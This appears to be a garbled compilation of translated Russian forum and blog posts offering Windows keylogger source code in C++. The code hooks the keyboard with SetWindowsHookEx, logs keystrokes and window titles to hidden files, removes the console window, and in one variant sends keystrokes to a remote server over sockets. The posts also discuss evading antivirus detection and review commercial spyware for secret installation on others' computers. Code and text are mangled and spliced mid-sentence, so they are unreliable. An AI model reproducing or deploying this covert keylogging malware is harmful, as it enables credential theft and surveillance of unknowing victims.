Information Security Laboratory. Information Security Laboratory Console keylogger
Hi all!
I had the idea of writing a keylogger a long time ago; at the beginning I wrote it in assembly language, but didn’t finish it, it turned out that it was very buggy, but because... There was a lot of work, but I’m not involved in commerce, the incentive quickly disappeared...
Time passed, I somehow forgot about this topic until I came across an article about attacks on the banking system using a simple keylogger and a completely legal program, probably for sending logs and bypassing firewalls...
I was wondering how difficult it is for an “average programmer,” of whom I consider myself, to write a simple keylogger, how it will be processed by the users, and how much time it will take!
The idea of creating such a topic/section appeared only later, when I had almost finished this keylogger.
But first things first, here are the answers to the questions of my mini-research:
1. At the time of writing, the keylogger detects some kind of Endgame, and if you play with Release/Debug and compilation settings, the detections disappear;
2. The keylogger works perfectly with UAC, practically does not burn itself, i.e. you will never understand that your keys are being written to the log.
3. Antiviruses do not react in any way, i.e. They think that’s how it should be.
4. How long did it take?
About 5 o'clock but this needs to be taken into account that I have no experience working in a studio, I had to deal with character encoding, hooks, etc. Of course there was more hassle with coding...
So let's move on to the main part of this article:
1. Statement of the problem:
Write a local keylogger that can track keystrokes and record them in the log; you also need to indicate in the log the date of the press and the application window where the key was pressed; the keylogger must work with Russian and English layouts. Also, the keylogger must work with limited rights in the system and not give itself away in any way, example log:
Unnamed - Notepad: English: M: Fri May 12 20:38:39 2017
Unnamed - Notepad: English: ,: Fri May 12 20:38:41 2017
Unnamed - Notepad: Russian: : : Fri May 12 20:38:48 2017
Unnamed - Notepad: Russian: : Р: Fri May 12 20:38:48 2017
Unnamed - Notepad: Russian: : И: Fri May 12 20:38:48 2017
Unnamed - Notepad: Russian: : e: Fri May 12 20:38:50 2017
2.The main idea of writing such programs:
It doesn’t matter what you want to write on, the main idea is to put a hook, in simple terms, it’s a “trap” for the keyboard, the point is that when the user presses a key, your program will execute your function (subroutine), where you You can already determine the key pressed, write it to the log, etc.
Windows has it SetWindowsHookEx, which installs a program-defined filter procedure (hook) into a filter chain (hook). You must set up a filter procedure (hook) in order to control certain types of events in the system. These events are associated either with a specific thread or with all threads on the same desktop as the calling thread.
Pay attention to the last sentence, thanks to this property, we can track all keystrokes in other applications.
How to do this, example:
Int main(int argc, _TCHAR* argv) ( keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0); msgLoop(); return 0; )
HookProc - This is our subroutine (Which will be called after the user presses a key) that we will write later.
MsgLoop() - Also a very important thing, there is a loop, if in simple terms the program is looping and will constantly call hookProc when the user presses a key, here is its code:
Void msgLoop() ( while (GetMessage(&message, NULL, 0, 0)) ( TranslateMessage(&message); DispatchMessage(&message); ) )
Function GetMessage retrieves a message from the calling thread's message queue and places it in the specified structure. This function throttles the arrival of sent messages as long as the queued message is available for retrieval.
Function TranslateMessage translates virtual key messages into character messages.
Function DispatchMessage distributes a message to a window procedure. It is used to deliver the message retrieved by the function GetMessage.
Now let's start writing our main function (subroutine), which will be called after the user clicks on the button:
Spoiler: hookProc (C++ code)
LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam) ( if (wParam == WM_KEYDOWN) ( HKL Lang_Keyboard; GetActiveKb (Lang_Keyboard); //Get the current layout. int CodeKeyboard = (int) Lang_Keyboard; p = (PKBDLLHOOKSTRUCT)( lParam); sc = MapVirtualKey(p->vkCode, 0);<<= 16; if (!(p->vkCode<= 32)) { sc |= 0x1 << 24; } GetKeyNameTextA(sc, keyNameBuff, 16); myKey = keyNameBuff; if (myKey == "Space") { writeToLog(""); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog(""); } else { if (CodeKeyboard == 0x4190419) { //Русская раскладка //************************************************************************************************* if (isCaps() == 1) { myKey = GetSymbolRu (myKey); writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); myKey = GetSymbolRu (myKey); writeToLog(myKey); } //************************************************************************************************* } else { if (isCaps() == 1) { writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); writeToLog(myKey); } } } } return CallNextHookEx(NULL, nCode, wParam, lParam); }
I’ll tell you the idea, you can see the program itself in the attachment:
1. Let's start with the prototype of our subroutine:
LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam)
WParam - Determines whether a key is pressed, so before we do anything, we check whether the key is pressed like this:
2.1. Get the keyboard layout;
2.2. Receive a virtual keyboard code, from which we can already determine what exactly the user pressed;
2.3. Well, in general, get our symbol.
All of the above is done by this code:
HKL Lang_Keyboard;<<= 16; if (!(p->vkCode<= 32)) { sc |= 0x1 << 24; } GetKeyNameTextA(sc, keyNameBuff, 16);
GetActiveKb(Lang_Keyboard); //Get the current layout.
int CodeKeyboard = (int) Lang_Keyboard;
p = (PKBDLLHOOKSTRUCT)(lParam);
sc = MapVirtualKey(p->vkCode, 0);
sc
GetKeyNameTextA - Places the name of the key into the keyNameBuff buffer.<< title; log << ": English"; log << ": " << s; log << ": " << asctime(timeinfo) << endl;
The name of the program the user is working with can be obtained like this:
GetWindowTextA(hwnd, title, 100); GetWindowTextA(hwnd, ntitle, 100); ///pars
The time is like this:// Gettime time_t seconds = time(NULL); tm* timeinfo = localtime(&seconds);
Ofstream log(logName, ios::app); log<>logName - The path where the log file will be written, I use standard output to the ofstream stream, it can be written, for example, in AppData (Write there), get the path something like this:
Strcpy(logName, getenv("APPDATA")); // Get APPDATA folder strcat(logName, "log.log");
BUT THAT'S NOT ALL, NOW THE MOST INTERESTING, NAMELY GetKeyNameTextA - IT WORKS ONLY WITH LATIN SYMBOLS, HOW TO DO SUPPORT FOR THE CYRILITIC?
You can make the following crutch, simply compare the Cyrillic and Latin alphabet, something like this:
String _eng = "1234567890~!@#$%^"zxcvbnm,./QWERTYUIOPASDFGHJKL:\"|ZXCVBNM
?"; char _rus = "1234567890е!\"No.;%:?ytsukengshschzkhjfyvaproljayachsmitby.Ytsukengshshchzhfyvaproldzhe/yachsmitby,";
Char * tmp = new char ; // initialize the additional array CharToOemA(_rus88, tmp); // convert delete tmp; // remove the additional array
We convert the string with the Cyrillic alphabet, for this we allocate a buffer in memory and use CharToOemA(_rus88, tmp);, now our string will be normally written to a file and output to the console, do not forget to delete delete tmp from memory; Then...:)
If (CodeKeyboard == 0x4190419) ( //Russia log<< title; log << ": Russian"; log << ": " << ReplaceResult(s); log << ":^^^ " << s; log << ": " << asctime(timeinfo) << endl; } else if (CodeKeyboard == 0x4090409) { //Eng log << title; log << ": English"; log << ": " << s; log << ": " << asctime(timeinfo) << endl; }
Well, of course, we will still need to determine additional. keys such as space, enter, etc., something like this:
If (myKey == "Space") ( writeToLog(""); ) else if (myKey == "Right Alt") ( writeToLog(""); ) else if (myKey == "Enter") ( writeToLog(" "); ) else if (myKey == "Left Alt") ( writeToLog(""); ) else if (myKey == "Tab") ( writeToLog(""); ) else if (myKey == "Backspace" ) ( writeToLog(""); ) else if (myKey == "Caps Lock") ( writeToLog(""); ) else if (myKey == "Delete") ( writeToLog(""); ) else if (myKey == "Right Shift") ( writeToLog(""); ) else if (myKey == "Shift") ( writeToLog(""); ) else if (myKey == "Ctrl") ( writeToLog(""); ) else if (myKey == "Right Ctrl") ( writeToLog("");
Everything seems to be basic, the source is in the attachment, it should be clear I think... :)
Oh yeah, I almost forgot:
1. Run on any computer in Visual Studio 2010 (It will increase the size of the binary, but it’s better to do it):
(Project) -> (Properties) -> (Configuration Properties) -> (C/C++) -> (Code Generation) -> (Temporary Execution Library) -> (Multithreaded / MT) and then “OK”;
(Project) -> (Properties) -> (C/C++) -> (Code Generation) -> (Runtime Library) -> (Multi-threaded(/MT)) -> Ok
2. I used a console project, it’s easier to debug, so also:
How to remove the console:
Click Project => Properties(or Alt+F7).
Then Linker => Advanced and drive into Entery Point following: mainCRTStartup.
Just naked sources (There are two of them), for copy-paste and analysis.
A COUPLE MORE QUESTIONS ABOUT KEYLOGER:
1) Is it necessary to develop it, now there is this:
Support for the Latin/Cyrillic alphabet, but not all characters, if I decide to develop it, I will fix it;
A little garbage is written to the logs (You don’t need to take into account the keys that are marked with the “/” symbol), this can be removed.
You can add screenshot support.
2) In general, let us know if this needs to be developed further, by the way, Relise was uploaded to VT, but this is not scary and on purpose, you can then continue to work on bypassing the detection and how and how long it will take for others to have the detection.
PLEASE UNSUBSCRIBE IF POSSIBLE, IF IT MAKES SENSE TO CONTINUE TO CREATE SIMILAR TOPICS AND DEVELOP SIMILAR PRODUCTS HERE! :)
Various spy programs are necessary in conditions where many people have access to one computer.
In these circumstances, the user may want to know which sites were visited from his computer (for example, by children), whether credit cards were stolen using saved passwords, etc. To clarify these issues, it will be necessary.
Our review will allow you to make the best choice.
Features of choice
What exactly is a keylogger? This is a program that, strictly speaking, is not directly related to the keyboard.
It is installed in the computer's memory and acts on. Often, signs of its activity are not visible on the computer unless you specifically look for them.
Such a program interacts indirectly with the keyboard, that is, it works with a program on the PC that converts the signals received by the processor as a result of pressing buttons into text when printing.
That is, the action of such software is aimed at collecting information entered through the keyboard.
Such utilities come in different types - with some you can view all the text typed on the keyboard, with others - only what was typed in the browser or in any selected application.
Some programs provide the ability to configure such indicators, others do not.
They also differ from each other in the degree of secrecy. For example, the activity of some is obvious, a shortcut remains on the Desktop, etc., such programs are suitable for monitoring the activities of, for example, children.
Traces of the presence and activity of others are not noticeable at all - they act hidden and are suitable for installation on someone else’s computer, when the fact of installation needs to be hidden from a third-party user.
Given such diversity, choosing the most suitable software can be quite difficult.
This material presents the TOP of the best programs that can be used for this purpose. It is easier to choose the right one among them.
Specifications
To simplify the software selection process, the table below shows the main comparative characteristics of all programs included in the TOP.
| Name | License type | Type of information collected | Functional | Design |
|---|---|---|---|---|
| SC-KeyLog | For free | All | Wide | Simplified |
| WideStep Handy Keylogger | Free/Paid | All | Wide | Improved |
| Actual Spy | Paid | All | Very wide | Standard |
| EliteKeylogger | Paid | All | Wide | Standard |
| The Rat! | Free/Paid | Less than previous | Quite wide | Unaesthetic |
| SPYGO | For free | Depending on version | Depending on version | Standard Windows appearance |
| Ardamax Keylogger 2.9 | For free | From the keyboard | Narrowed | Simplified |
| NS Keylogger Personal Monitor 3.8 | For free | All | Narrowed | Simplified |
| KGB Spy | Paid | From the keyboard + open programs | Narrow | Simple |
| Golden Keylogger 1.32 | For free | From the keyboard | Very narrow | Simple |
Based on the characteristics from this table, it is easy to choose the program that best suits your specific requirements.
These utilities are described in more detail below.
SC-KeyLog
This is a voluminous and functional spy program that is distributed free of charge.
In addition to specifically tracking information entered from the keyboard, it is also able to collect addresses of visited sites, passwords, and open browser windows.
Provides complete information about all actions performed on the computer. In this case, the generated file can be viewed remotely from another device.
- Possibility of remote access to a file from another device;
- No traces of program activity on the computer with the correct settings;
- Variety of data collected - information about almost all actions on the PC can be accessed.
- Saves passwords only up to NT0;
- Too simple menu and unaesthetic design;
- A rather inconvenient format for displaying the result.
What do users who actively use this software say? “Absolutely invisible to the user”, “Data arrives regularly by email.”
WideStep Handy Keylogger
This application is distributed free of charge. The full paid version costs $35.
Quite an interesting and functional program that is worth the money if you are willing to pay it.
Distinctive feature– the ability to send recorded data at a specified frequency. Otherwise it works fine, often more stable than other programs on this list.
- Collection of various types of information;
- Complete invisibility of work on the user’s computer;
- Simple interface and controls.
- The design is better than the previous program, but still not great;
- The result display format is inconvenient;
- The paid version is quite expensive.
Users' opinions about this software are as follows: “Convenient, simple and functional program. Quite invisible when working.”
Actual Spy
This is a functional and complex paid program costing 600 rubles. However, it has a demo version that is free.
Feature of this software– ability in a given period of time.
This helps solve the problem of entering a graphic password/key, which has recently become widespread.
- Many types of information collected plus the ability to take screenshots from the screen during a specified period;
- A large number of other additional functions and features;
- Records not only actions, but also the time they were performed;
- Encrypts the generated log.
- The duration of work (collection of information) in the free demo version is 40 minutes;
- Paid distribution, although a more or less reasonable price;
- The weight of the program is quite large.
User reviews of this application are as follows: “The program is excellent. Well done programmers!”
EliteKeylogger
Paid program with a fairly high price– 69 dollars. It operates completely undetectably on a PC in low-level mode, making it almost completely undetectable.
Interesting and convenient feature– automatic launch of software, occurring simultaneously with the launch of the system itself.
It is difficult to detect or not detected at all even by special anti-keyloggers.
- Completely hidden action and difficult to detect;
- Low-level driver-type operating format and automatic startup when the system boots;
- It also tracks the presses of not only the main, but also the service keys on the keyboard.
- A rather complex system for installing the program on a PC;
- The program is expensive, but you can find an old hacked version on the Russian Internet;
- A rather complex system of individual program settings, which, however, justifies itself.
What do users say about this software? “Good program”, “A little short of Jetlogger.”
The Rat!
Quite a common and popular, functional utility with a paid license.
However, for private use, a free demo version is provided for a limited period.
The program is very simple– any advanced user can write the same. However, it is completely undetectable by antiviruses and special programs that detect such software.
- Simplicity, functionality and high stability;
- Minimum file weight and space occupied by it on the computer;
- Quite a lot of settings.
- A rather unpleasant design, made in black, white and red;
- The functionality is somewhat narrower than in the programs described before;
- Inconvenient viewing of the log and generally inconvenient interface and use.
Users say the following about this program: “It works stably, but is a bit simple,” “The program is good, it allows you to collect data unnoticed.”
SPYGO
This is a fundamentally new keylogger, designed to work on and developed by a Russian programmer.
Hello, Khabrovsk residents.
I decided to write a software keyboard logger in C++ using WinAPI. I can’t say that I was pursuing some kind of espionage goal when I wrote it; rather, I was getting acquainted with WinAPI hooks. Since it turned out not so bad, and there is no article about software loggers on Habré, I decided to write my own.
How is this done?
A keyboard hook was used to catch keypresses.HHOOK WINAPI SetWindowsHookEx(_In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId);
In order to intercept all keyboard keystrokes, it is convenient to specify WH_KEYBOARD or WH_KEYBOARD_LL as the idHook parameter. The only difference is that WH_KEYBOARD_LL also intercepts system key presses (i.e. Alt or any key while Alt is held down), so we will select it.
Lpfn is a pointer to a function that processes intercepted messages (in our case, keystrokes).
hMod is an application instance handle containing a processing function.
dwThreadId is the identifier of the thread whose messages we want to intercept. This parameter must be set to 0 to intercept messages from all threads.
The return value is a handle to our hook, which will need to be freed with the UnhookWindowsHookEx function when exiting.
Looking at MSDN for help, we see a prototype of a function that processes messages from this hook.
LRESULT CALLBACK LowLevelKeyboardProc(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam);
nCode must be equal to HC_ACTION, otherwise the message is given to another process.
wParam is one of the following values: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, or WM_SYSKEYUP.
lParam is a pointer to the KBDLLHOOKSTRUCT structure, in the fields of which we are interested only in 2 parameters: vkCode (virtual code) and scanCode of the pressed key.
This function must return the value of the CallNextHookEx function, otherwise the next hook that processes the event may receive incorrect message parameters.
Every time a key is pressed, our program will intercept this event and process it with our LowLevelKeyboardProc procedure.
In order to retranslate the virtual and scan code of a key into symbolic form, we need the ToAsciiEx function.
Int WINAPI ToAsciiEx(_In_ UINT uVirtKey, _In_ UINT uScanCode, _In_opt_ const BYTE *lpKeyState, _Out_ LPWORD lpChar, _In_ UINT uFlags, _In_opt_ HKL dwhkl);
The first 2 parameters are the virtual and scan codes of the key, respectively.
lpKeyState — keyboard state, checks which keys are pressed/active.
lpChar is a pointer to a double word into which the function will write the symbolic representation of the key.
uFlags is a parameter indicating menu activity.
dwhkl — keyboard layout identifier.
The return value is the number of characters written to the lpChar buffer. We are interested in the case when 1 character is written.
Basically, these are the 3 main functions required for the simplest keyboard logger.
A little about the program
The program is compiled without RTL in Visual Studio 2013. Thus, we get a small size of the executable file and the impossibility of building in the debug version. The data is written to a log file in the same directory where the .exe file is located. For convenience, the logger creates a new file each time it records, records the time of key presses, the name of the window in which the characters were entered, and stops by pressing LSHIFT+RSHIFT. This sniffer is not adapted for a full keyboard; some service keys, such as F13 or NUM_LOCK, can be written as . I think those who are at least a little familiar with C/C++ can easily add them. Moreover, you can completely change the code to suit you.
And before you start reading, take a look at my blog, where I publish my original articles on programming, virology and other interesting things
Original article -
All information is provided for informational purposes only. Neither the administration nor the author are responsible for any possible harm caused by the materials of this article.
Preface
For about a month, I constantly observed various requests and questions about keyloggers. Many searched, but could not find the source code, many searched, but the sales people could not find it, etc.
In this article I want to show how easy it is to write your own keylogger with basic functionality. I borrowed the base from here - * * , fixed bugs and modified it to interact with WinSocket.
Materials
- Visual Studio 2015 Community Update 4
- Visual C++ 2015
First, you need to determine how the keylogger will work in general. Be it sending logs to FTP/Mail, recording clicks on a socket, sending a file to a gate, writing logs to a database.
I decided to stick with sockets. Why? It's convenient, simple and usable.
Based on the choice, we will need to make 2 applications:
Server
- Console application that will receive data from the client and output it in the console
- Actually, the keylogger itself, which will send keystrokes to the server
Server
We create a C++ console application in Visual Studio.
All the code is in the office. MSDN example - *Login to the forum to view links. *
We just need to replace some values in it...
Let’s immediately write down constant variables: the buffer size and the server port to which the logs will be sent
Code:
#define DEFAULT_BUFLEN 1024 //Buffer #define DEFAULT_PORT "1337" //Port
Instead of a one-time do/while, we set up an endless loop in which we will receive data from the client, output it to the console, close the connection, and do it again:Code:
Do ( ClientSocket = accept(ListenSocket, NULL, NULL); // Accept the connection iResult = recv(ClientSocket, recvbuf, recvbuflen, 0); // Read the log if (iResult > 0) // If the log is not empty printf("% s", recvbuf); //Output closesocket(ClientSocket);//Close the connection memset(recvbuf, 0, sizeof recvbuf);//Release memory ) while (true);
We compile to Release, upload it to Dedik, open the port we need and launchClient
Create a Win32 application in Visual Studio.
As I said above, I took the keyboard hook and click handler from *Login to the forum to view links. *
To secure the sending of clicks to the socket, I turned to *Login to the forum to view links. *
Also, we immediately define constant variables: buffer length, Dedik/computer IP and port
Code:
#define DEFAULT_BUFLEN 20000 #define SERVER_IP "127.0.0.1" #define SERVER_PORT "1337"
Some variables had to be taken out of their methods and made global for the code to start working correctly:Code:
WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct; char lastwindow; int Save(int key_stroke);// Removed the second argument
We create a method for sending data to the server following the example at the beginning of the paragraph. Next, everywhere we replace the port, IP and transmitted information with function arguments:Code:
Void sendData(char *ip, char * port, char*data)
In the Save method, we do the following - we remove the second argument and change the recording of logs to a file to send to the server:Code:
Char data; sprintf(data, "\n\n\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, data);
Next, using the same principle, we change the sending of service keystrokes. You can send letters this way:Code:
Char c; sprintf(c, "%c", key_stroke); sendData(SERVER_IP, SERVER_PORT, c);
We cut out everything related to the visibility of the window from the code, and we’re done.Bottom line
When the keylogger is launched, it will hang in the processes and process every keystroke. It is possible that some characters will be displayed incorrectly, for example, slashes, but all this can be corrected yourself (after all, if everything was perfect, Jesus would knock on my PM asking me to check the salesman of the private keylogger).
Published January 18, 2015. Where?" There is no need to look for easy ways, especially on the Internet :). Download keylogger for free you can, but be prepared for various restrictions or surprises. Firstly, the functionality of the keylogger will be low. Free demo versions of full-fledged programs usually contain limitations, sometimes unexpected ones :). Secondly, there will be no additional programs or functions for log processing, tracking settings, etc. that usually accompany keyloggers. Thirdly, you will not find keylogger support from manufacturers. Instead of looking where download keylogger for free, think about writing it yourself? simplest keylogger for Windows It’s not very difficult to write if you have the basics of Windows programming. So, we continue to publish the keylogger sources. Keylogger for Windows written in C++, naturally using the Win API. The key hook is implemented using SetWindowsHookEx(WH_KEYBOARD_LL,...). An executable file is created without a dll library, so to speak, a keylogger in one file! The advantages are obvious - it is easier to organize a remote installation, smaller size, greater secrecy (the DLL will not hang in the processes of all applications). The disadvantage of this interception method is that it is unstable, or generally refuses to work in Windows 7. Intercepting keys without using a dll (WH_KEYBOARD_LL) causes misunderstanding among the seven. You have to use shamanism and magic to make the keylogger work. Of course, there is always a way out (look for it yourself, and may the force be with you :)). You can also write a normal one using SetWindowsHookEx (WH_KEYBOARD_LL ,...). Everything will be fine in Windows 7. How WH_KEYBOARD_LL will work in Windows 8 is not yet known.
Logging is organized through a file stream. Added some things to improve log readability. The code is small and efficient. Suitable for a keylogger for windows with certain additives and the question is where can I download keylogger for free disappears.
Source file *.exe:
#include< windows.h >#include< fstream >#include< iostream >#include< algorithm >#include< string >using namespace std; string myKey; BOOL isCaps(); char logName = "keys.txt";//LOG FILE name //init all variables for speed MSG message; HHOOK keyboardHook; char keyNameBuff; PKBDLLHOOKSTRUCT p; unsigned int sc; //keylogger for Windows void writeToLog(string s) //write a string to the log ( ofstream log(logName, ios::app); //opens log file log<< s; //writes to log.. with format "[""]" log.close(); //closes log } // Кейлоггер для Windows BOOL isCaps() { if ((GetKeyState(VK_CAPITAL) & 0x0001)!=0 || ((GetKeyState(VK_SHIFT) & 0x8000)!=0)) { return 1; } else { return 0; } } // Кейлоггер для Windows LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam)//proc to be run on hooked key { if (wParam == WM_KEYDOWN)//if key event type is key down { //get the keyname from lParam p = (PKBDLLHOOKSTRUCT) (lParam);//used to get the vkCode sc = MapVirtualKey(p->vkCode, 0);<<= 16; //shift 16 bits if (!(p->vkCode<= 32))//if not ascii { sc |= 0x1 << 24; // <- extended bit } GetKeyNameTextA(sc,keyNameBuff,16); // Кейлоггер для Windows - исходник //gets ASCII key name from sc into keyNameBuff //write keyname to log myKey = keyNameBuff; if (myKey == "Space") { writeToLog(" "); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog(""); } // if its none of the special keys else { if (isCaps() == 1) { writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); writeToLog(myKey); } } } return CallNextHookEx(NULL, nCode, wParam, lParam); } // Кейлоггер для Windows void msgLoop() { while (GetMessage(&message,NULL,0,0)) { TranslateMessage(&message); DispatchMessage(&message); } } // Кейлоггер для Windows int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0); //hooks keyboard msgLoop(); //stops from closing // Кейлоггер для Windows - исходник UnhookWindowsHookEx(keyboardHook); //unhooks return 0; //Never run }
sc
keylogger for WindowsYou can use any development environment you like (Dev-C++, MSVS, Borland C++). We collect, make the necessary individual changes andready and spend time searching for where you can
